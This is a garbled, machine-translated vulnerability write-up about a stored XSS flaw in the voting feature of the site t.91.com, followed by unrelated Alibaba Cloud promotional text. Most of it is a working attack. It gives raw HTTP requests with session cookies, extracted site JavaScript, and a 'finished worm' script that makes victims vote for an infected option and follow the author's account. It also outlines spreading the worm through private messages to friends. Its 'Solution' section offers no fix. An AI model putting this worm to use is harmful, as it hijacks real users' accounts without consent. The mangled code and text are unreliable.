91 XSS exists in the Community voting area, which can cause XSS worm Propagation 1: Create an arbitrary vote, add options, and add "XSS code" 2: Access the voting page to trigger the implementation of XSS Worm: the voting function of the custom js file target exists in xss. You can modify the voting option to run xss. Once the infected js is accessed, perform the following operations: 1. automatically participate in malicious voting, select the infected option to vote (the voting option will be broadcast to spread) post Implementation ************************************ vote start ********************** POST/vote/dovote/vid/433 HTTP/1.1/433 is the voting id Host: t.91.comProxy-Connection: keep-aliveContent-Length: 6 Origin: http://t.91.comX-Requested-With : XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1 LBBROWSERContent-Type: application/x-www-form-urlencodedAccept: application/json, text/javascript, */*; q = 0.01 Referer: http://t.91.com/379610694 // 379610694 is your own idAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN, zh; q = 0.8Accept-Charset: GBK, UTF-8; q = 0.7, *; q = 0.3 Cookie: SUV = 1359475045777963; _ utma = Beijing; _ utmz = 1.1359475333.1.1.utmcsr = (direct) | utmccn = (direct) | utmcmd = (none ); signal = signal = 00:13:04 & Signal = signal & Signal = 465842840 & BF191744-3205-4d76-B8FC-3E0387F7EEFE = signal; mininav = 0; signedip = signal; PHPSESSID = b2974cfa13861b6803838a46dcdec208; NDUserCenterLogin = Cost = 379610694 & cost = Cost & C201DE9A-536B-428d-88E4-4F8665742D12 = 200 & cost = 20130131130528 & cost = 14:05:28 & cost = 84301d8b2526e000016aa4941b0f8babd; _ TM_CN_SSO_CK = 1359608730; uapc = Ready % 3D; showtip_gamecard1_10694 = 1; 60FC5FF9-8883-207a-B0DC-C834CE0B56A3 = mjawlt1_ltc % 3D; ms_nums = 0; comment_nickname = 91% E7 % 94% A8 % E6 % 88% B7 % E7 % 9A % 84% E5 % 95% 8A; comment_user_nickname = 91% E7 % 94% A8 % E6 % 88% B7 % E7 % 9A % 84% E5 % 95% 8A; comment_user_nickname_short = 91% E7 % 94% A8 % E6 % 88% B7 % E7 % 9A % 84% E5 % 95% 8A; comment_user_id = 379610694; comment_user_name = 594yd; u_total_score = 0; u_do_score = 0; u_fight = 0 r = 1415 // 1415 is the option id **************************** * ************************************ 2: read the friends list and send friends the insite emails (insite emails spread) that allow them to vote to get the list, post mail *********************************** friend read * **************************** http://t.91.com/friend/ajaxfriendlist // This is a list of friends: after a friend's information is displayed, the friend will continue to get the profile picture of each friend/center/avatar. php? Uid = 379454311 & size = small & type = real & random = 1359609442 // 379454311 is the friend id ******************* ******************** * *** POST/pm/sendpm/379610694 HTTP/1.1 // 379610694 is the recipient's idHost: t.91.comProxy-Connection: keep-aliveContent-Length: 31 Origin: http://t.91.comX-Requested-With : XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1 LBBROWSERContent-Type: application/x-www-form-urlencodedAccept: application/json, text/javascript, */*; q = 0.01 Referer: http://t.91.com/pm/index/newpm/uid=379610694 // 379610694 is the recipient's idAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN, zh; q = 0.8Accept-Charset: GBK, UTF-8; q = 0.7, *; q = 0.3 Cookie: SUV = 1359475045777963; _ utma = Beijing; _ utmz = 1.1359475333.1.1.utmcsr = (direct) | utmccn = (direct) | utmcmd = (none ); 0FF535D2-3733-4059-AA48-73EFB0DA00CE = 376FC8AE-EA0A-4aa9-8CF8-BDCF086DAFE7 = 2013-01-30 00:13:04 & 43cb770b-ecb7-20172-9f28-474c7 56FA85C = signature & Signature = 465842840 & BF191744-3205-4d76-B8FC-3E0387F7EEFE = signature; mininav = 0; signedip = signature; PHPSESSID = b2974cfa13861b6803838a46dcdec208; NDUserCenterLogin = Signature = 379610694 & Signature = Signature Small & Small = Small & C201DE9A-536B-428d-88E4-4F8665742D12 = 200 & Small = 20130131130528 & 8e533c9e-481d-4288-89b2-71f96450c540 = 14:05:28 & large = 84301d8b2526e36716aa4941b0f8babd ;_ TM_CN_SSO_CK = 1359608730; uapc = Ready % 3D; showtip_gamecard1_10694 = 1; 60FC5FF9-8883-207a-B0DC-C834CE0B56A3 = mjawlt1_ltc % 3D; ms_nums = 0; comment_nickname = 91% E7 % 94% A8 % E6 % 88% B7 % E7 % 9A % 84% E5 % 95% 8A; comment_user_nickname = 91% E7 % 94% A8 % E6 % 88% B7 % E7 % 9A % 84% E5 % 95% 8A; comment_user_nickname_short = 91% E7 % 94% A8 % E6 % 88% B7 % E7 % 9A % 84% E5 % 95% 8A; co Mment_user_id = 379610694; comment_user_name = 594yd; u_total_score = 0; u_do_score = 0; u_fight = 0 osubject = zhti & message = zhengwen // subject and body ************************* * ************************************** 3: automatically listen to the propagation initiator (count the number of infections). get /? Controller = friend & action = follow & fid = 379454312 // the id of the person to be followed is the first thought. I have learned js scripts for more than one day, then I tried to write a day to submit data in the js background, and I found myself NC this afternoon .. The reason is:
I have my own functions officially .. Find the js file where the function is located.
Extract the relevant code and analyze the function implementation methods: * ********************************** doVote () * function doVote () {var _ = art. t91_Waiting (); $. ajax ({url: $ GLOBALS ["site_url"] + "vote/dovote/vid/" + cur_vid, type: "post", dataType: "json", data: $ ("# voteform "). serialize (), // cur_vid is the id of the voting initiated, and the value of data is selected by the framework, that is, the option success: function (){_. close (); if (. status = 1) {art. tips ("succee D ", A.html); // return the message LoadPageMainHtml (" commoninfo ", $ (" # copyurl "). val () + (typeof reqs_from! = "Undefined" & reqs_from! = 0 )? ("/From/" + reqs_from): ""), true, true)} else {art. t91_TipsIcon ("error", A.html); // Response Message for failed requests }}})} *********************************** * *** doVote () vote ***************************** the voting vid is visible in the status bar, that is, the value of the option to be cast is visible in debugging mode.
That is, the data value is "r = 1482 "****************************** * ***** doAddFollow (_) follow the instructions in ***** function doAddFollow (_) {$. ajax ({url: site_url + "? Controller = friend & action = follow ", type:" get ", dataType:" json ", data:" fid = "+ _, // variable" _ ", right, the underscore (_) indicates the UID of the person to be followed. The following describes the returned messages in various situations. Success: function (A) {if (. state = 1) {var B = $ ("div [name = 'followconcern _" + _ + "']"); if (B. length> 0) {if (. follow = 1) {B. find ("em [class = 'color _ 3']" ).html ("\ u5df2 \ u5173 \ u6ce8"); B. find ("span [name = 'ico ']"). removeClass (); B. find ("span [name = 'ico ']"). addClass ("ico I _ygz"); B. find ("span [class = 'col']" ).html ("| <a href = 'javascript: void (0 ); 'onclick = 'delfollow ("+ _ +"); 'class = 'Contact _ Cancel '> \ u53d6 \ u6d88 </a> ")} else if (. follow = 2) {B. find ("em [class = 'color _ 3']" ).html ("\ u76f8 \ u4e92 \ u5173 \ u6ce8"); B. find ("span [name = 'ico ']"). removeClass (); B. find ("span [name = 'ico ']"). addClass ("ico I _hxgz"); B. find ("span [class = 'col']" ).html ("| <a href = 'javascript: void (0 ); 'onclick = 'delfollow ("+ _ +"); 'class = 'Contact _ cancel '> \ u53d6 \ u6d88 </a> ")} art. tips ("succeed",. msg); delUsercard ("id =" + _) ;}} Else if (. state = 2) {art. tips ("warning",. msg);} else if (. state = 3) {art. tips ("warning",. msg);} else {art. tips ("error",. msg );}}})} *********************************** * ***** doAddFollow (_) follow the instructions of ****************************** since it is worm, there must be no message prompts, so streamline the official code by leaving only the data submitted and integrating it into the js we need: * ************************************ finished worm * * ********************* doAddFollow1 (379454311 ); // 3 79454311 your own uidwindow. setTimeout ("doVote1 ();", 1000); // doVote1 () is executed with a 1 s latency. Otherwise, function doVote1 () {var _ = art may occur in the case of packet loss. t91_Waiting (); $. ajax ({url: $ GLOBALS ["site_url"] + "vote/dovote/vid/453", type: "post", dataType: "json", data: "r = 1482", // vid of the voting initiated by 453, id of the voting by 1482 (that is, option with XSS code) success: function (){_. close () ;})} function doAddFollow1 (_) {$. ajax ({url: site_url + "? Controller = friend & action = follow ", type:" get ", dataType:" json ", data:" fid = "+ _, success: function () {if (. state = 1) {var B = $ ("div [name = 'followconcern _" + _ + "']"); if (B. length> 0) {art. tips ("succeed",. msg); delUsercard ("id =" + _);}}}})} * ************************************ finished worm * * *********************** ps: I just learned js and recently tried to learn the single-chip microcomputer. I didn't continue to study the second function. I can modify it according to the js Code of the voting. I'm sorry ..Solution:How to fix
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
